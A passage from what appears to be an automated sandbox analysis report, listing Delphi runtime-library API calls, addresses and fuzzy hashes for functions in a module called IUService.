                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(5850026B,5850026B,5850026B,A850017A), ref: 500122EB
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$String$Except$qqrvException@$bctr$qqrx20LoadRaiseString$qqrp20System@@Sysutils@Unicode
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 486460785-0
                                                                                                                                            • Opcode ID: 7528642fe36d409ab37d41aa7cd802e04feb64ed356f621298a75c45d9c0b7a2
                                                                                                                                            • Instruction ID: 93523e8249dd9ce77bc6417ffb8b9f6d823e4069e3a6fe8b24fa869761cfaa76
                                                                                                                                            • Opcode Fuzzy Hash: 7528642fe36d409ab37d41aa7cd802e04feb64ed356f621298a75c45d9c0b7a2
                                                                                                                                            • Instruction Fuzzy Hash: 73014531108188AFE7219B54FD5285DBBE8EF11B00FA14A67F880C3121EA36AE20C691
                                                                                                                                            APIs
                                                                                                                                            • @Variants@@VarCast$qqrr8TVarDatarx8TVarDatai.RTL120(?,?,?,50031AAD,?,?,?,?,?,50031D04,?,?,50031826,?,?), ref: 500319EA
                                                                                                                                            • @Variants@VarResultCheck$qqrlusus.RTL120(?,?,00000400,00000000,?,?,?,?,50031AAD,?,?,?,?,?,50031D04), ref: 50031A07
                                                                                                                                            • @Variants@VarResultCheck$qqrlusus.RTL120(?,?,00000400,00000000,?,?,?,?,50031AAD,?,?,?,?,?,50031D04), ref: 50031A33
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Check$qqrlususResultVariants@$Cast$qqrr8DataiDatarx8Variants@@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3943155465-0
                                                                                                                                            • Opcode ID: 77355a2d1c28337b9aea844143a0d13c94828378edea623601bc6950340cad5c
                                                                                                                                            • Instruction ID: 02da0ea19857f0b83c7a60a854380d64f6c7b6957c68f820763625778b4e7104
                                                                                                                                            • Opcode Fuzzy Hash: 77355a2d1c28337b9aea844143a0d13c94828378edea623601bc6950340cad5c
                                                                                                                                            • Instruction Fuzzy Hash: E8F0F9203028602FC631935E9C41BDB63DAEFE9A13F108117F300DB3A5CE745C46C2A6
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002D61B), ref: 5002D5E1
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5002D61B), ref: 5002D5F4
                                                                                                                                            Similarity
                                                                                                                                            • API ID: StringSystem@System@@Unicode$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Char$qqrx20Internal
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4285912285-0
                                                                                                                                            • Opcode ID: b9cb69941f6bd798a715a23d18ccd4e8101779eda8d34779b1012db782d0a2da
                                                                                                                                            • Instruction ID: 2bb75f54c739022caca7f9861818caf256e2ce358085963fa9b364de837498d7
                                                                                                                                            • Opcode Fuzzy Hash: b9cb69941f6bd798a715a23d18ccd4e8101779eda8d34779b1012db782d0a2da
                                                                                                                                            • Instruction Fuzzy Hash: 0C01A230701A96EFAF01DFA8E9A1859B3F8EF4920079046B2E604D3311EB70EE01D650
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 3491d13ce977adb284dd967d48cb490c5e952e317b4e9566dc2991631f39bb96
                                                                                                                                            • Instruction ID: c1de16781ca36d56b2275917d1e3df3af7e72a7d42cbb7651fe9816313171543
                                                                                                                                            • Opcode Fuzzy Hash: 3491d13ce977adb284dd967d48cb490c5e952e317b4e9566dc2991631f39bb96
                                                                                                                                            • Instruction Fuzzy Hash: 5701F2721005859FE7A0CFA8EC92949F3B5FB95311BC983A6FA1487662D731AA84C550
                                                                                                                                            APIs
                                                                                                                                            • @System@@WStrFromUStr$qqrr17System@WideStringx20System@UnicodeString.RTL120(?,00000000,50019880), ref: 50019831
                                                                                                                                            • @System@@WStrToPWChar$qqrx17System@WideString.RTL120(?,00000000,50019880), ref: 50019839
                                                                                                                                            • CLSIDFromString.OLE32(00000000,?,00000000,50019880), ref: 5001983F
                                                                                                                                            • @System@@WStrClr$qqrpv.RTL120(50019887,50019880), ref: 5001987A
                                                                                                                                              • Part of subcall function 500197B8: @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,?,00000000,?,5001E08F), ref: 500197CC
                                                                                                                                              • Part of subcall function 500197B8: @System@@RaiseExcept$qqrv.RTL120(00000000,?,?,00000000,?,5001E08F), ref: 500197D1
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$StringSystem@@$FromWide$Char$qqrx17Clr$qqrpvExcept$qqrvException@$bctr$qqrp20RaiseRecpx14RecxiStr$qqrr17Stringx20Sysutils@Unicode
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1168828238-0
                                                                                                                                            • Opcode ID: 9ab87b7335fb4515f68039e7d798c1498550c4d3bc14ec7b5041b138188d54e0
                                                                                                                                            • Instruction ID: 4276e7b8eb8c2fd0cf21d2c372ffec7e5207b388c706a152fa8cb5ce2d8a9212
                                                                                                                                            • Opcode Fuzzy Hash: 9ab87b7335fb4515f68039e7d798c1498550c4d3bc14ec7b5041b138188d54e0
                                                                                                                                            • Instruction Fuzzy Hash: D901D630904688AFEF05CFB5DC519CEB7E8DF4A210F90467AF800D3251EE349E008650
                                                                                                                                            APIs
                                                                                                                                            • @System@@LStrAddRef$qqrpv.RTL120 ref: 5000B59C
                                                                                                                                            • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,5000B600), ref: 5000B5CE
                                                                                                                                              • Part of subcall function 500089C4: @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 500089C9
                                                                                                                                            • @System@@WStrFromPCharLen$qqrr17System@WideStringpci.RTL120(00000000,5000B600), ref: 5000B5E5
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(5000B607), ref: 5000B5FA
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$FromSystem@$AnsiStr$qqrr27StringStringusSystem@%T$us$i0$%x20Unicode$CharClr$qqrpvInternalLen$qqrr17Ref$qqrpvStringpciWide
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 179845556-0
                                                                                                                                            • Opcode ID: 8a79d907e03b4d6e94affb683d3040e6e61c9eeb7bdf99ad1ec3cb23640d17fb
                                                                                                                                            • Instruction ID: 34ef6e9b8ab651ca66ea423fa2b672ec6f6307ffe3dcc90be6e42d6dd710627f
                                                                                                                                            • Opcode Fuzzy Hash: 8a79d907e03b4d6e94affb683d3040e6e61c9eeb7bdf99ad1ec3cb23640d17fb
                                                                                                                                            • Instruction Fuzzy Hash: 8B014F30A14689DFAF15EFB8DD6166EB7F8EB44300BE042B5A404D3294EB75EE00D785
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@ExtractFilePath$qqrx20System@UnicodeString.RTL120(00000000,5001D0F1), ref: 5001D0AB
                                                                                                                                              • Part of subcall function 5001C610: @Sysutils@LastDelimiter$qqrx20System@UnicodeStringt1.RTL120(?,?,00000001,5001BE69,00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 5001C61E
                                                                                                                                              • Part of subcall function 5001C610: @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,?,?,00000001,5001BE69,00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 5001C62F
                                                                                                                                            • @Sysutils@ExtractFileDrive$qqrx20System@UnicodeString.RTL120(00000000,5001D0F1), ref: 5001D0B5
                                                                                                                                              • Part of subcall function 5001C70C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C8D4), ref: 5001C749
                                                                                                                                              • Part of subcall function 5001C70C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C8D4), ref: 5001C774
                                                                                                                                              • Part of subcall function 5001C70C: @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,5001C8D4), ref: 5001C79A
                                                                                                                                            • @System@@UStrDelete$qqrr20System@UnicodeStringii.RTL120(00000000,5001D0F1), ref: 5001D0D6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$System@@$String$StringiiSysutils@$AnsiCopy$qqrx20ExtractFileFromInternalStr$qqrr20Stringx27System@%T$us$i0$%$Delete$qqrr20Delimiter$qqrx20Drive$qqrx20LastPath$qqrx20Stringt1
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2728986464-0
                                                                                                                                            • Opcode ID: 753f7e1a6c6c97bbf24396121e6cbfb91f1a8a2250ef5da3e68a7d15cb4d6440
                                                                                                                                            • Instruction ID: b42390ce6f7e2cc3f0a2e75dff1ecda8a9c22fa8fff3ef8285b34e87ebe0e190
                                                                                                                                            • Opcode Fuzzy Hash: 753f7e1a6c6c97bbf24396121e6cbfb91f1a8a2250ef5da3e68a7d15cb4d6440
                                                                                                                                            • Instruction Fuzzy Hash: 36F0C230714A889FDB05CFBCDC9195D77E8EB8D210F6046B6F404D3381EA34DE429694
                                                                                                                                            APIs
                                                                                                                                            • @System@@LStrToString$qqrv.RTL120(00000000,5000D25A,?,?,?,00000000), ref: 5000D229
                                                                                                                                            • @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000D25A,?,?,?,00000000), ref: 5000D235
                                                                                                                                            • @System@UTF8EncodeToShortString$qqrx20System@UnicodeString.RTL120(00000000,5000D25A,?,?,?,00000000), ref: 5000D23F
                                                                                                                                              • Part of subcall function 5000D160: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000D1E0,?,?,?,?,?,50007075), ref: 5000D199
                                                                                                                                              • Part of subcall function 5000D160: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,5000D1E0,?,?,?,?,?,50007075), ref: 5000D1AD
                                                                                                                                              • Part of subcall function 5000D160: @System@UnicodeToUtf8$qqrpcuipbui.RTL120(?,00000000,5000D1E0,?,?,?,?,?,50007075), ref: 5000D1BC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Unicode$StringSystem@@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Char$qqrx20EncodeInternalShortString$qqrvString$qqrx20Utf8$qqrpcuipbui
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3607580448-0
                                                                                                                                            • Opcode ID: fb3adfc1b616c63d37c10a095645c24805800dc440cd7556cb7450fc6099ad38
                                                                                                                                            • Instruction ID: 1c16621e2cb8d67273f367093e7f4ec9039ce1562dd6be5a7fed7262e5487efd
                                                                                                                                            • Opcode Fuzzy Hash: fb3adfc1b616c63d37c10a095645c24805800dc440cd7556cb7450fc6099ad38
                                                                                                                                            • Instruction Fuzzy Hash: E8F0C238705AC4ABF7109EA5997156A72E9EBA8600FD18273F900C3641DA74DD0392A0
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000B67E), ref: 5000B64C
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@WStrFromPWCharLen$qqrr17System@WideStringpbi.RTL120(00000000,5000B67E), ref: 5000B663
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FromSystem@System@@$AnsiStr$qqrr20StringStringx27System@%T$us$i0$%Unicode$CharInternalLen$qqrr17StringpbiWide
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3836375802-0
                                                                                                                                            • Opcode ID: 121b1d7daa110de507159fd92aaf49f5188387cc7d6252307e2916458b3dc339
                                                                                                                                            • Instruction ID: 5ba6b1cf659b0eac9df44331a80376275ae431139069cf899d630c05516daaeb
                                                                                                                                            • Opcode Fuzzy Hash: 121b1d7daa110de507159fd92aaf49f5188387cc7d6252307e2916458b3dc339
                                                                                                                                            • Instruction Fuzzy Hash: 12016D30A00688DFEB11DFB8D96259DB7F9EB85300BE046B2E504E3254EB35DF10DA40
                                                                                                                                            APIs
                                                                                                                                            • @System@@LStrAsg$qqrpvpxv.RTL120(00000000,5000D115,?,?,?,00000000), ref: 5000D0E4
                                                                                                                                            • @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000D115,?,?,?,00000000), ref: 5000D0F0
                                                                                                                                            • @System@UTF8Encode$qqrx20System@UnicodeString.RTL120(00000000,5000D115,?,?,?,00000000), ref: 5000D0FA
                                                                                                                                              • Part of subcall function 5000CF8C: @System@@LStrClr$qqrpv.RTL120(00000000,5000D09C), ref: 5000CFB7
                                                                                                                                              • Part of subcall function 5000CF8C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000D09C), ref: 5000CFDE
                                                                                                                                              • Part of subcall function 5000CF8C: @System@@LStrSetLength$qqrv.RTL120(00000000,5000D09C), ref: 5000CFF9
                                                                                                                                              • Part of subcall function 5000CF8C: @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,5000D09C), ref: 5000D01A
                                                                                                                                              • Part of subcall function 5000CF8C: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,00000000,5000D09C), ref: 5000D02E
                                                                                                                                              • Part of subcall function 5000CF8C: @System@@LStrToPChar$qqrx27System@%AnsiStringT$us$i0$%.RTL120(00000000,00000000,00000000,5000D09C), ref: 5000D037
                                                                                                                                              • Part of subcall function 5000CF8C: @System@UnicodeToUtf8$qqrpcuipbui.RTL120(00000000,00000000,5000D09C), ref: 5000D040
                                                                                                                                              • Part of subcall function 5000CF8C: @System@@LStrSetLength$qqrv.RTL120(00000000,00000000,5000D09C), ref: 5000D056
                                                                                                                                              • Part of subcall function 5000CF8C: @System@@LStrAsg$qqrpvpxv.RTL120(00000000,00000000,5000D09C), ref: 5000D06A
                                                                                                                                              • Part of subcall function 5000CF8C: @System@@LStrClr$qqrpv.RTL120(5000D0A3), ref: 5000D08E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                             • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                             • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                             • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                             • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                             • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                             • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                             • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                             • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            APIs
                                                                                                                                            • @System@@WStrLen$qqrx17System@WideString.RTL120(00000000,500093F1,?,?,?,?,00000000,?,5000938F), ref: 500093AE
                                                                                                                                            • @System@@LStrFromWStr$qqrr27System@%AnsiStringT$us$i0$%x17System@WideStringus.RTL120(00000000,500093F1,?,?,?,?,00000000,?,5000938F), ref: 500093C8
                                                                                                                                            • @System@@WriteLString$qqrr15System@TTextRecx27System@%AnsiStringT$us$i0$%i.RTL120(00000000,500093F1,?,?,?,?,00000000,?,5000938F), ref: 500093D4
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(500093F8,?,?,?,00000000,?,5000938F), ref: 500093EB
                                                                                                                                              • Part of subcall function 500087A8: @System@@FreeMem$qqrpv.RTL120(?,50004445,5000444D), ref: 500087C4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            APIs
                                                                                                                                            • @System@FindResourceHInstance$qqrui.RTL120(00010000,?,00001000), ref: 5000D60F
                                                                                                                                            • LoadStringW.USER32(00000000,00010000,?,00001000), ref: 5000D615
                                                                                                                                            • @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120 ref: 5000D620
                                                                                                                                            • @System@@UStrFromPWChar$qqrr20System@UnicodeStringpb.RTL120 ref: 5000D62C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5000473D
                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000105), ref: 50004752
                                                                                                                                            • @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,?,00000105), ref: 5000475D
                                                                                                                                              • Part of subcall function 50009E7C: @System@@NewUnicodeString$qqri.RTL120(?,?,?,50004762,00000000,?,00000105), ref: 50009E87
                                                                                                                                              • Part of subcall function 50009E7C: @System@Move$qqrpxvpvi.RTL120(?,?,?,50004762,00000000,?,00000105), ref: 50009E9A
                                                                                                                                              • Part of subcall function 50009E7C: @System@@LStrClr$qqrpv.RTL120(?,?,?,50004762,00000000,?,00000105), ref: 50009EA1
                                                                                                                                            • GetCommandLineW.KERNEL32 ref: 50004764
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            APIs
                                                                                                                                            • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 5002689B
                                                                                                                                            • @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(?,00000000,500268EC,?,?,?,?,00000000), ref: 500268C0
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,500268EC,?,?,?,?,00000000), ref: 500268CB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@AnsiUpperCase$qqrx20System@UnicodeString.RTL120(00000000,5001551A,?,?,?,00000000,00000000), ref: 500154DC
                                                                                                                                              • Part of subcall function 50019EBC: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50019F40,?,?,?,?,?,500154E1,00000000,5001551A,?,?,?,00000000,00000000), ref: 50019EF5
                                                                                                                                              • Part of subcall function 50019EBC: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,50019F40,?,?,?,?,?,500154E1,00000000,5001551A,?,?,?,00000000,00000000), ref: 50019F08
                                                                                                                                              • Part of subcall function 50019EBC: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,50019F40,?,?,?,?,?,500154E1,00000000,5001551A,?,?,?,00000000,00000000), ref: 50019F13
                                                                                                                                              • Part of subcall function 50019EBC: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,50019F40,?,?,?,?,?,500154E1,00000000,5001551A,?,?,?,00000000,00000000), ref: 50019F1F
                                                                                                                                              • Part of subcall function 50019EBC: CharUpperBuffW.USER32(00000000,?,00000000,50019F40,?,?,?,?,?,500154E1,00000000,5001551A,?,?,?,00000000), ref: 50019F25
                                                                                                                                            • @Sysutils@AnsiUpperCase$qqrx20System@UnicodeString.RTL120(?,00000000,5001551A,?,?,?,00000000,00000000), ref: 500154EA
                                                                                                                                            • @Sysutils@AnsiPos$qqrx20System@UnicodeStringt1.RTL120(00000000,5001551A,?,?,?,00000000,00000000), ref: 500154F3
                                                                                                                                              • Part of subcall function 50028754: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50028822), ref: 5002879B
                                                                                                                                              • Part of subcall function 50028754: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50028822), ref: 500287C3
                                                                                                                                              • Part of subcall function 50028754: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,50028822), ref: 500287D7
                                                                                                                                              • Part of subcall function 50028754: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,?,00000000,50028822), ref: 500287E0
                                                                                                                                              • Part of subcall function 50028754: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,50028822), ref: 500287F6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$String$System@@$Ansi$Char$qqrx20$From$InternalStr$qqrr20Stringx27System@%Sysutils@T$us$i0$%Upper$Case$qqrx20Char$BuffLen$qqrr20Pos$qqrx20StringpbiStringt1
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1811596575-0
                                                                                                                                            • Opcode ID: f8655f718251c2dc71c6e2303aeecd35c5678775ca9ef57c7831b282cf33942c
                                                                                                                                            • Instruction ID: c0b1a5ea2b56544e033e8cc658cc13535f1bdf9ea375e6b9a9d5c146db7ca2d2
                                                                                                                                            • Opcode Fuzzy Hash: f8655f718251c2dc71c6e2303aeecd35c5678775ca9ef57c7831b282cf33942c
                                                                                                                                            • Instruction Fuzzy Hash: 74F0E936705744AFEB01CAE4DC51B9DB7EDDB48210F518572F900D7341D6749E0086D4
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@ExtractFileName$qqrx20System@UnicodeString.RTL120(00000000,5001C600,?,?,?,?,00000000,00000000), ref: 5001C5C7
                                                                                                                                              • Part of subcall function 5001C8E4: @Sysutils@LastDelimiter$qqrx20System@UnicodeStringt1.RTL120(?,?,?,5001C5CC,00000000,5001C600,?,?,?,?,00000000,00000000), ref: 5001C8F2
                                                                                                                                              • Part of subcall function 5001C8E4: @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,?,?,?,5001C5CC,00000000,5001C600,?,?,?,?,00000000,00000000), ref: 5001C904
                                                                                                                                            • @Sysutils@IncludeTrailingPathDelimiter$qqrx20System@UnicodeString.RTL120(?,00000000,5001C600,?,?,?,?,00000000,00000000), ref: 5001C5D5
                                                                                                                                              • Part of subcall function 500286A0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,?,5001C5DA,?,00000000,5001C600,?,?,?,?,00000000,00000000), ref: 500286AB
                                                                                                                                              • Part of subcall function 500286A0: @Sysutils@IsPathDelimiter$qqrx20System@UnicodeStringi.RTL120(?,?,?,5001C5DA,?,00000000,5001C600,?,?,?,?,00000000,00000000), ref: 500286C5
                                                                                                                                              • Part of subcall function 500286A0: @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,?,5001C5DA,?,00000000,5001C600,?,?,?,?,00000000,00000000), ref: 500286D5
                                                                                                                                            • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,5001C600,?,?,?,?,00000000,00000000), ref: 5001C5E0
                                                                                                                                              • Part of subcall function 5000A1E4: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5000A202
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$StringSystem@@$Stringx20Sysutils@$Delimiter$qqrx20$Asg$qqrr20Path$Cat$qqrr20Cat3$qqrr20Copy$qqrx20ExtractFileIncludeLastName$qqrx20StringiStringiiStringt1Stringt2Trailing
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4289416924-0
                                                                                                                                            • Opcode ID: cbb00767dfdef57c8a6a94f2a97003c90a3088f6f5a0bed04f05ac7a6cd57dea
                                                                                                                                            • Instruction ID: 57fd14a13350398e88c99b23b071614aa93d96e5052488e5150640dac515cbaf
                                                                                                                                            • Opcode Fuzzy Hash: cbb00767dfdef57c8a6a94f2a97003c90a3088f6f5a0bed04f05ac7a6cd57dea
                                                                                                                                            • Instruction Fuzzy Hash: ABF0BE35305384ABE711DAA5EC51E8AB7ADEBC9620FA14666B904E3341D974EE0085A4
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@AnsiLowerCase$qqrx20System@UnicodeString.RTL120(00000000,500288FA,?,?,?,00000000,00000000,?,5001CAC7,00000000,5001CC45), ref: 500288BC
                                                                                                                                              • Part of subcall function 50019F4C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50019FD0), ref: 50019F85
                                                                                                                                              • Part of subcall function 50019F4C: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,50019FD0), ref: 50019F98
